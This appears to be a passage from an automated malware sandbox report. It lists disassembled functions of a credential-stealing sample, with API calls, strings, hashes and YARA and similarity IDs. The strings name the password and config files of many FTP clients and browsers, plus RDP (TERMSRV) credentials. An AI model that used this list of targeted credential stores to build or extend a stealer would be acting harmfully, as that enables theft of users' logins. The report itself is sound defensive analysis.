                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$My FTP$XDp$project.ini
                                                • API String ID: 1884169789-4144297628
                                                • Opcode ID: 8053ae7c130db41f9b11dd27f96358f3d4422c72d1528fa28ec15a84cf9d7be8
                                                • Instruction ID: dc2e5743d3051a8b2d431c239bfacc6a075ff92f77e2013cd18376d7b0eadfc4
                                                • Opcode Fuzzy Hash: 8053ae7c130db41f9b11dd27f96358f3d4422c72d1528fa28ec15a84cf9d7be8
                                                • Instruction Fuzzy Hash: 0E01D670504115BADB1177668C01F9B7F59DB81318F240D3BB950B11E2F77C9E92929C
                                                Function 0040A144 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,WinFTP), ref: 0040A172
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$Favorites.dat$WinFTP$XDp
                                                • API String ID: 1884169789-613684079
                                                • Opcode ID: 6d07a4fa71da6e0b55c39a300303122fc8201443dc3c12620699a64e37237601
                                                • Instruction ID: cd2585765ada306bdb4c6f471fa67e0287bcc736790fbbdd257811b3a2605063
                                                • Opcode Fuzzy Hash: 6d07a4fa71da6e0b55c39a300303122fc8201443dc3c12620699a64e37237601
                                                • Instruction Fuzzy Hash: 3701F470600205BADB2277259C01F9B7F55DB82364F28413BB851B92E2D77C8E92D3ED
                                                Function 0040F906 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,FastTrack), ref: 0040F934
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$FastTrack$XDp$ftplist.txt
                                                • API String ID: 1884169789-2599595899
                                                • Opcode ID: 55ea187d0cb8c00720327f23aadaf3edc8abbeb004095c79273b3437fdac17a2
                                                • Instruction ID: 396507b48aabb71f267d08f879d847fba005e25ea80404fc12cd3c9f9e346ce3
                                                • Opcode Fuzzy Hash: 55ea187d0cb8c00720327f23aadaf3edc8abbeb004095c79273b3437fdac17a2
                                                • Instruction Fuzzy Hash: 3201D670504106BADB2276358C01F9B7E55DB81754F24013BB850B16E2D7795E9293EC
                                                Function 0040DEE4 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,FTPShell), ref: 0040DF12
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$FTPShell$XDp$ftpshell.fsi
                                                • API String ID: 1884169789-3163282236
                                                • Opcode ID: dd6416760811fc27447f527697605dcedefa14434bc917533f565477c277f8de
                                                • Instruction ID: 0223982157bc78e7f7b3c8b5b80daeb52112694ad693ea29ceadf3c1998cbfb9
                                                • Opcode Fuzzy Hash: dd6416760811fc27447f527697605dcedefa14434bc917533f565477c277f8de
                                                • Instruction Fuzzy Hash: 87014930904106BADB1177618C01F9B3F55DB82354F24813BB951711E2D77C9E82839C
                                                Function 0040DFD1 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,NexusFile), ref: 0040DFFF
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$NexusFile$XDp$ftpsite.ini
                                                • API String ID: 1884169789-3304524516
                                                • Opcode ID: 43e960bb37f8414185b25a92b9ef3f0877c102d1eda73c9185fc0001e6eb0650
                                                • Instruction ID: 0f716640b70d201f2f329b02194ae8b07a4dd60e68bb1147a4a4e66ade58e48c
                                                • Opcode Fuzzy Hash: 43e960bb37f8414185b25a92b9ef3f0877c102d1eda73c9185fc0001e6eb0650
                                                • Instruction Fuzzy Hash: EF01D170500115BADB216A26CC01F9E7F99DB82364F24453BB950B12E2E7B89E9297AC
                                                Function 00408293 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,?,0000001B), ref: 004083EB
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040840C
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$FreeLocal
                                                • String ID: ]A$]A
                                                • API String ID: 2558778219-3231057216
                                                • Opcode ID: 404b6c1429344f1c5127e9c70ee5f01d18d8d11957ac5a1ad8030549458bd8a6
                                                • Instruction ID: b5c686e66aa75bb0ea5c3a45f9d24023e4dde9a45453e9509f1690b0b28c1787
                                                • Opcode Fuzzy Hash: 404b6c1429344f1c5127e9c70ee5f01d18d8d11957ac5a1ad8030549458bd8a6
                                                • Instruction Fuzzy Hash: 6F518F72A00219AFEF10AE65EC45BDF7BA5FB80314F00843AF950B72D1DBB99D10DA58
                                                Function 0040C587 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5A7
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5C9
                                                • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C5DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$OpenStorage
                                                • String ID: Settings
                                                • API String ID: 2489594185-473154195
                                                • Opcode ID: d8e2c43f552cd5be9f122384b3bed41607f0a0515e63b31b02fc0204f5f899cf
                                                • Instruction ID: 45371d5192e4b28a761186b6385347240049983ed8c7a30cfb32e2f7b06d0ba5
                                                • Opcode Fuzzy Hash: d8e2c43f552cd5be9f122384b3bed41607f0a0515e63b31b02fc0204f5f899cf
                                                • Instruction Fuzzy Hash: E431CC31A4010AFBEF11AFA1CC42F9EBB76BF04704F208676B611791F1D7759A50AB58
                                                Function 004017D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?), ref: 004017E5
                                                • GlobalLock.KERNEL32(?), ref: 00401800
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • GlobalUnlock.KERNEL32(?), ref: 0040185E
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040186D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$Local$AllocFreeFromLockStreamUnlock
                                                • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                                • API String ID: 1329788818-258907703
                                                • Opcode ID: 56b21bb33aac6a82660614896146e3409b500c85d2ae59914b4ff5d62cb87d5a
                                                • Instruction ID: ebbbe2b59391e3aaee2ab6b6a4edf92b2b65332d5e813d2d7ef502307b157ca4
                                                • Opcode Fuzzy Hash: 56b21bb33aac6a82660614896146e3409b500c85d2ae59914b4ff5d62cb87d5a
                                                • Instruction Fuzzy Hash: E921EC72D00109BBEF017FE1CC42AAD7E76EF10344F10807ABA10751B1E77A9A609B98
                                                Function 00408568 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: http://$https://
                                                • API String ID: 0-1916535328
                                                • Opcode ID: f80222c2be3f39736afa5bdbc870f2f4b69eab5c1b9cd07a085db7d06d61aa49
                                                • Instruction ID: 36914738dcc24f5284e4ebbc1b9eef358293ae7963248e41ec2cf401613fd4ce
                                                • Opcode Fuzzy Hash: f80222c2be3f39736afa5bdbc870f2f4b69eab5c1b9cd07a085db7d06d61aa49
                                                • Instruction Fuzzy Hash: 6C411931800109FADF12AF91CE05BDE7BB6AF40358F10853AB551791F1CB7A4B90EB99
                                                Function 00401AEC Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00401AF6
                                                • GetHGlobalFromStream.OLE32(?,?), ref: 00401B0F
                                                • GlobalLock.KERNEL32(?), ref: 00401B2A
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • GlobalUnlock.KERNEL32(?), ref: 00401B52
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
                                                • String ID:
                                                • API String ID: 1884134869-0
                                                • Opcode ID: a6e021ce18fff2a2ec2b37efbbfb5ce86c0a90fa50629b721e29d811f84a25f4
                                                • Instruction ID: 621e9e9be75d07b42097c487be39cb2d33a31aa4828135fb6f0f97c2ff2c831f
                                                • Opcode Fuzzy Hash: a6e021ce18fff2a2ec2b37efbbfb5ce86c0a90fa50629b721e29d811f84a25f4
                                                • Instruction Fuzzy Hash: 21219875D0010CBEDF01AFA1DC429DDBB7AAF04344F0040B6BA15B51B1DB799BA5AB98
                                                Function 0040C3AF Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,K-Meleon), ref: 0040C3D6
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocallstrcatlstrcpy
                                                • String ID: 8Ap$K-Meleon$\Profiles
                                                • API String ID: 3221862373-1593404455
                                                • Opcode ID: a858e8d3e49293d64023f48dbd86bfc66e191896084e83ba2a9a4783122f8104
                                                • Instruction ID: 4873897dde30dd4dbf8587ad023f8bffba789afd884ab7b067c2024aa4535c65
                                                • Opcode Fuzzy Hash: a858e8d3e49293d64023f48dbd86bfc66e191896084e83ba2a9a4783122f8104
                                                • Instruction Fuzzy Hash: 26118F30540108FADF222BA1CC42EAD7E66AF55344F14423AB904741F2D7798A91A758
                                                Function 0040CC29 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                • StrStrIA.SHLWAPI(?,0041679F), ref: 0040CC68
                                                • lstrlen.KERNEL32(TERMSRV/,?,0041679F), ref: 0040CC76
                                                • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,0041679F), ref: 0040CC86
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: TERMSRV/
                                                • API String ID: 1659193697-3001602198
                                                • Opcode ID: 973b5681ba22234737b84a6ea26a33df1634edba24d759306a1e8466351013e8
                                                • Instruction ID: 0e33322fa43a7393c9c901e98c28ddf77560ff6a40d7ebd916c261fa5b4e0482
                                                • Opcode Fuzzy Hash: 973b5681ba22234737b84a6ea26a33df1634edba24d759306a1e8466351013e8
                                                • Instruction Fuzzy Hash: B011A835410109FFDF026F61CD428DD3E62AF44398F104536B929791F1DB7A8AB1AB98
                                                Function 0040C7AB Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,FreshFTP), ref: 0040C7D2
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: .SMF$8Ap$FreshFTP
                                                • API String ID: 1884169789-3664833108
                                                • Opcode ID: 454fa819fdd3e24f95ce041dd73a3575ccba9cef9d95e204f9cd3b60f17f143f
                                                • Instruction ID: 477fad2c5324d79bae27c71323b2f58287a32a148f67e115926fd6e1bf06e8da
                                                • Opcode Fuzzy Hash: 454fa819fdd3e24f95ce041dd73a3575ccba9cef9d95e204f9cd3b60f17f143f
                                                • Instruction Fuzzy Hash: 6AF0F431900105FADF223B65CC41FAE7FA19B81744F24423AB410711E2E7B98A91D75C
                                                Function 0040C516 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,Staff-FTP), ref: 0040C53D
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$Staff-FTP$sites.ini
                                                • API String ID: 1884169789-1193396973
                                                • Opcode ID: 1e29051f39b9b98068a91518eade9c9277cbd39c9ed21cf938d3e73f03a9e06c
                                                • Instruction ID: 86c97d9f4ce5bd779839c9a6a5c351d92fa3fa347d4bfa9cfc32d2e10e445be4
                                                • Opcode Fuzzy Hash: 1e29051f39b9b98068a91518eade9c9277cbd39c9ed21cf938d3e73f03a9e06c
                                                • Instruction Fuzzy Hash: B6F0F674500101B5DB217735DC42F6F3E999B81794F14033AB410B11E6EBBC9F81D29C
                                                Function 0040C9E8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,GoFTP), ref: 0040CA0F
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$Connections.txt$GoFTP
                                                • API String ID: 1884169789-2081745633
                                                • Opcode ID: 3f66269d1b3452a2299dea9a804d1b5a09767ab400e56e2bff911dd811526a0c
                                                • Instruction ID: bfa60bb2ce1f4916441e22987b850a7f4e4a5f93a4d34056f73a81fc435db6d2
                                                • Opcode Fuzzy Hash: 3f66269d1b3452a2299dea9a804d1b5a09767ab400e56e2bff911dd811526a0c
                                                • Instruction Fuzzy Hash: 44F0F670600105B6DB21B7758C42FAF3E559B81354F24433AB810B11E2E7BC8E9196AC
                                                Function 00409061 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlen.KERNEL32(?), ref: 00409074
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409095
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectorylstrlen
                                                • String ID: nss3.dll
                                                • API String ID: 2713697268-2492180550
                                                • Opcode ID: 120aac01b1d19bf89567df46df9f15ac37a0c958acc84ce813f69d2bc8fe1057
                                                • Instruction ID: 79ef5b793eaa19e43d16629d1b832ed7db9b7e222fb3f2d26c77b95c4dd7ac76
